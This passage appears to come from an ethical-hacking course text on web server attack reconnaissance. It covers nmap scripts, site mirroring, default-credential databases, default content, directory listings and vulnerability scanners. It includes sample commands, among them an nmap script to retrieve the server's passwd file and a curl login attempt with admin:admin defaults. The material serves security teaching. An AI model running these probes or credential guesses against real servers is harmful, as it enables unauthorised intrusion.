■    Obtain robots.txt

$nmap -p80 --script http-robots.txt <host>

Below are some of the additional Nmap commands used to extract information:

■    nmap -sV -O -p- <target IP address>

■    nmap -sV --script=http-enum <target IP address>

■    nmap <target IP address> -p 80 --script=http-frontpage-login

■    nmap --script http-passwd --script-args http-passwd.root=/ <target IP address>


Website Mirroring

Website mirroring copies an entire website and its content onto a local drive. The mirrored website reveals the complete profile of the site's directory structure, file structure, external links, images, web pages, and so on. With a mirrored target website, an attacker can easily trace out the website's directories and gain valuable information without needing to be online; the attacker can examine the site at any time and can also gain valuable information by searching the comments and other items in the HTML source code of the downloaded web pages. There are many website mirroring tools available to copy a target website onto a local drive, such as HTTrack, WebCopier Pro, Website Ripper Copier, GNU Wget, and so on.
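Since GNU Wget is among the tools listed, a minimal mirroring sketch looks like this (reusing this module's example domain as a placeholder):

# --mirror enables recursive download with timestamping, --convert-links
# rewrites links for offline browsing, and --page-requisites also fetches
# the images, CSS, and scripts each page needs
wget --mirror --convert-links --page-requisites http://www.certifiedhacker.com/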

■    HTTrack

Source: https://www.httrack.com

HTTrack is an offline browser utility. It downloads a website from the Internet to a local directory, building all directories recursively and getting HTML, images, and other files from the server. HTTrack preserves the original site's relative link structure. Simply open a page of the "mirrored" website in a browser and browse the site from link to link, as if viewing it online.

Following are some of the additional website mirroring tools:

■    WebCopier Pro (http://www.maximumsoft.com)

■    Website Ripper Copier (http://www.tensons.com)

■    GNU Wget (https://www.gnu.org)

■    Pavuk Web Spider and Performance Measure (http://pavuk.sourceforge.net)

■    Getleft (https://sourceforge.net)

■    Offline Downloader (http://www.offlinedownloader.com)

■   WebRipper (http://visualwebripper.com)

■   SurfOffline (http://surfoffline.com)

■    NCollector Studio (http://www.calluna-software.com)

■    Portable Offline Browser (http://www.metaproducts.com)

■    Backstreet Browser (http://www.spadixbd.com)

■ Offline Explorer Enterprise (http://www.metaproducts.com)

■   Teleport Pro (http://www.tenmax.com)

■    Hooeey Webprint (http://www.hooeeywebprint.com)

■   Visual SEO Studio (https://visual-seo.com)


Finding Default Credentials of a Web Server

Admins or security personnel use administrative interfaces to securely configure, manage, and monitor web application servers. Many web server administrative interfaces are publicly accessible and located in the web root directory. Often these administrative interface credentials are not properly configured and remain set to defaults. Attackers attempt to identify the running application interface of the target web server by performing port scanning. Once the running administrative interface is identified, the attacker uses the following techniques to identify the default login credentials:

■   Consult the administrative interface documentation and identify the default passwords

■    Use Metasploit's built-in database to scan the server

■    Use online resources such as Open Sez Me (http://open-sez.me) and cirt.net (https://cirt.net/passwords) to find the default passwords

■   Attempt password-guessing and brute-forcing attacks

Finding these default credentials can give the attacker access to the administrative interface, compromising the respective web server and allowing the attacker to exploit the main web application itself.
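A trivial first check once an administrative interface is found is simply to try a documented default pair; the URL and credentials below are hypothetical examples, not guaranteed defaults for any product:

# Try HTTP Basic authentication with a commonly documented default pair;
# a 200 response instead of 401 suggests the default was never changed
curl -i -u admin:admin http://www.example.com/admin/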

■   cirt.net

Source: https://cirt.net/passwords

cirt.net is the lookup database for default passwords, credentials, and ports.

Following are some of the additional websites for finding web server administrative interface default passwords:

■   http://open-sez.me

■   https://www.fortypoundhead.com 

■   http://www.defaultpassword.us 

■   http://defaultpasswords.in

■ http://www.routerpasswords.com 

■ http://www.defaultpassword.com 

■ https://default-password.info


Finding Default Content of Web Server

Most web application servers contain default content and functionality that attackers can leverage in attacks. Following are some of the common default content and functionality that an attacker tries to identify on web servers:

■   Administrator debug and test functionality

Functionality designed for administrators to debug, diagnose, and test web applications and web servers contains useful configuration information and the runtime state of both the server and its running applications. Hence, such functionality is a main target that lures attackers.

■   Sample functionality to demonstrate common tasks

Many servers contain various sample scripts and pages designed to demonstrate certain application server functions and APIs. Often, the web server fails to secure these scripts from attackers, since the sample scripts either contain vulnerabilities that can be exploited or implement functionality that attackers can abuse.

■    Publicly accessible powerful functions

Some web servers include powerful functionality that is intended for administrative personnel and restricted from public use. However, an attacker tries to exploit such powerful functions to compromise the server and gain access. For example, some application servers allow web archives to be deployed over the same HTTP port as that used by the application itself. An attacker uses common exploitation frameworks such as Metasploit to scan for default passwords, upload a backdoor, and gain command-shell access to the target server.

■   Server installation manuals

An attacker tries to identify the server manuals that may contain useful information about configuration and server installation. Accessing this information allows the attacker to prepare appropriate framework to exploit the installed web server.

You can use tools such as Nikto2 and exploit databases such as SecurityFocus (http://www.securityfocus.com) to identify the default content.

■    Nikto2

Source: https://cirt.net

Nikto is a vulnerability scanner that is used extensively to identify potential vulnerabilities in web applications and web servers.
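A minimal Nikto run against a hypothetical target reports default files, sample scripts, and other default content along with known vulnerabilities:

# -h specifies the target host and -p the port to scan
nikto -h www.example.com -p 80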

Finding Directory Listings of Web Server

When a web server receives a request for a directory rather than an actual file, the web server responds to the request in one of the following ways:

■ Return a default resource within the directory

It may return a default resource within the directory, such as index.html.

■ Return an error

It may return an error, such as the HTTP status code 403, indicating that the request is not permitted.

■ Return a listing of the directory contents

It may return a listing showing the contents of the directory. A sample directory listing is illustrated in the screenshot in the slide.

Though directory listings do not have significant relevance from a security point of view, they sometimes expose the following weaknesses that allow attackers to compromise a web application:

■    Improper access controls

■    Unintentional access to web root of servers

In general, after discovering a directory on the web server, attackers request that directory and try to access its listing. Attackers also try to exploit vulnerable web server software that grants access to directory listings.
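A sketch of such a request against a discovered directory (host and directory are hypothetical):

# Request the directory itself rather than a file: markup such as
# "Index of /images" in the response indicates directory listing is
# enabled, while a 403 status indicates the listing is blocked
curl -i http://www.example.com/images/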


Vulnerability Scanning

Vulnerability scanning determines the vulnerabilities and misconfigurations of a target web server or network. Vulnerability scanning finds possible weaknesses in a target server that can be exploited in a web server attack. An attacker uses various automated tools to perform vulnerability scanning on a target server. In the vulnerability-scanning phase, attackers use sniffing techniques to obtain data about network traffic and find active systems, network services, and applications. You can use tools such as Acunetix Web Vulnerability Scanner to perform vulnerability scanning and find hosts, services, and vulnerabilities.

■   Acunetix Web Vulnerability Scanner

Source: https://www.acunetix.com

Acunetix Web Vulnerability Scanner scans websites and detects vulnerabilities. Acunetix WVS checks web applications for SQL injection, XSS, and so on. It includes advanced pen testing tools to ease manual security audit processes, and it creates professional security audit and regulatory compliance reports based on AcuSensor Technology, which detects more vulnerabilities and generates fewer false positives. It supports testing of web forms and password-protected areas, pages with CAPTCHAs, single sign-on, and two-factor authentication mechanisms. It detects application languages, web server types, and smartphone-optimized sites. Acunetix crawls and analyzes different types of websites, including HTML5, SOAP, and AJAX. It supports scanning of network services running on the server and port scanning of the web server.

Following are some of the additional vulnerability scanning tools:

■    Fortify WebInspect (https://software.microfocus.com)

■    Nessus (https://www.tenable.com)

■    Paros (https://sourceforge.net)

Finding Exploitable Vulnerabilities

Software design flaws and programming errors lead to security vulnerabilities. An attacker takes advantage of these vulnerabilities to perform various attacks on the confidentiality, availability, or integrity of a system. Attackers exploit software vulnerabilities, such as programming flaws in a program, service, or the OS software or kernel, to execute malicious code.

Many public vulnerability repositories available online allow access to information about various software vulnerabilities. Attackers search for exploitable web server vulnerabilities, based on the web server's OS and software applications, on exploit sites such as SecurityFocus (http://www.securityfocus.com) and Exploit Database (https://www.exploit-db.com). Attackers use the information gathered in the previous stages to find the relevant vulnerabilities, for example by using the site's More Options search filters.

Exploiting these vulnerabilities allows an attacker to execute a command or binary on a target machine to gain higher privileges than existing ones or to bypass security mechanisms. Attackers using these exploits can even access privileged user accounts and credentials.